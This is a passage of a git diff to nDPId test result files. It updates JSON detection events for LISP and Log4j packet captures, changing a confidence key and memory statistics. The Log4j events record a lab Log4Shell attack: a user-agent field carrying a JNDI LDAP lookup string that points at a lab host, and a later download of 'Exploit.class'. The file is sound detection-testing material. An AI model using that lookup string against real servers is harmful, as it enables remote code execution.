{"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1597152709936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACoAE0AAP8RsDMKAHsDCgB7ARD2EPYAlFlmMgABAqopDMUFFm31AAEAFBocdBgtY+Hz9Ueh9UZxQJ1vv2IjAAAFoAFAEAAAAAAC\/AABkgFoAQMAAAAAAAAAAP8hISEABQABCgB7AwAABaABgBAAAAAAAvwAAAAAAAAAAAAAAAAAAAMhISEhAAUAAQoAewNZ6z+5+pkdP+8AUonJfzt9AAAAAAAAAAA="} 
00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1597152709936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACAAE4AAP8RsFoKAHsDCgB7ARD2EPYAbDmBMgABAXFyKntOHooaAAEAFI0ikSo37n3NSMdaLlvkb41n5QfMAAAFoAEaEAAAAEADAAACIAAKAAAAZAABwKhnACEhISEABQABCgB7A1nrP7n6mR0\/7wBSicl\/O30AAAAAAAAAAA=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152711673,"flow_last_seen":1597152711673,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152711673,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1597152711673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711673,"pkt":"qrvMAAEAqrvMAAMACABFwAAsuMMAAP8G+EMKAHsDCgB7Ac8DEPZkcBpBAAAAAGACQADvdgAAAgQFtAAA"} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1597152711674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711674,"pkt":"qrvMAAMAqrvMAAEACABFwAAsBk8AAP8GqrgKAHsBCgB7AxD2zwMtqeWdZHAaQmASQADcHgAAAgQFtAAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1597152711674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152711674,"pkt":"qrvMAAEAqrvMAAMACABFwAAouMQAAP8G+EYKAHsDCgB7Ac8DEPZkcBpCLanlnlAQQADz2wAAAAAAAAAA"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152711673,"flow_last_seen":1597152711820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152711820,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152711673,"flow_last_seen":1597152712034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152709936,"flow_last_seen":1597152709943,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":868,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152685554,"flow_last_seen":1597152685560,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152687289,"flow_last_seen":1597152687645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":915,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152711673,"flow_last_seen":1597152711820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152711820,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152711673,"flow_last_seen":1597152712034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152709936,"flow_last_seen":1597152709943,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":868,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152685554,"flow_last_seen":1597152685560,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152687289,"flow_last_seen":1597152687645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":915,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":3790,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1597152712034} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 30/30 @@ -33,9 +33,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5877589 bytes -~~ total memory freed........: 5877589 bytes -~~ total allocations/frees...: 118158/118158 +~~ total memory allocated....: 6011223 bytes +~~ total memory freed........: 6011223 bytes +~~ total allocations/frees...: 120920/120920 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 690 chars 
diff --git a/test/results/log4j-webapp-exploit.pcap.out b/test/results/log4j-webapp-exploit.pcap.out
index 0e734933d..71ffc0bec 100644
--- a/test/results/log4j-webapp-exploit.pcap.out
+++ b/test/results/log4j-webapp-exploit.pcap.out
@@ -4,7 +4,7 @@ 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639425815407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADxjYEAAPQamLqwQ7gGsEO4KB8AfkHmWgrEAAAAAoAL68JU2AAACBAW0BAIICq34shoAAAAAAQMDBw=="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639425815407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADwAAEAAQAYGj6wQ7gqsEO4BH5AHwIo9\/lB5loKyoBJxIDRcAAACBAW0BAIICmhBAYSt+LIaAQMDBw=="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639425815408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815408,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADRjYUAAPQamNawQ7gGsEO4KB8AfkHmWgrKKPf5RgBAB9sqWAAABAQgKrfiyHGhBAYQ="} 
-01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815415,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAABAkKsEO4KrBDuCgAAAAAAAKwQ7gs="} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682} 
@@ -13,13 +13,13 @@ 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639425815682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815682,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADycRUAAQAZqP6wQ7gqsEO4L4TIFbQLNSvsAAAAAoAJyEDRmAAACBAW0BAIICvIpEmgAAAAAAQMDBw=="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639425815683,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815683,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hMnt33KkCzUr8oBJxIDRmAAACBAW0BAIICingw2TyKRJoAQMDBw=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1639425815683,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815683,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADScRkAAQAZqRqwQ7gqsEO4L4TIFbQLNSvx7d9yqgBAA5TReAAABAQgK8ikSaCngw2Q="} 
-00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815682,"flow_last_seen":1639425815692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425815692,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815682,"flow_last_seen":1639425815692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425815692,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815910,"flow_last_seen":1639425815910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815910,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639425815910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzhTUAAQAYlN6wQ7gqsEO4LvTwAUKwpPLEAAAAAoAJyEDRmAAACBAW0BAIICvIpE0sAAAAAAQMDBw=="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639425815910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9PH3sGAysKTyyoBJxIDRmAAACBAW0BAIICingxEfyKRNLAQMDBw=="} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639425815910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADThTkAAQAYlPqwQ7gqsEO4LvTwAUKwpPLJ97BgNgBAA5TReAAABAQgK8ikTSyngxEc="} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815910,"flow_last_seen":1639425815913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425815913,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} -01050{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425815910,"flow_last_seen":1639425815916,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425815916,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": 
{"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815910,"flow_last_seen":1639425815913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425815913,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}} +01050{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425815910,"flow_last_seen":1639425815916,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425815916,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App 
Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815944,"flow_last_seen":1639425815944,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815944,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639425815944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADw8h0AAQAZP8awQ7goKCgof2HAjKVh5kSAAAAAAoAJyEK5yAAACBAW0BAIICq5YAo8AAAAAAQMDBw=="} 
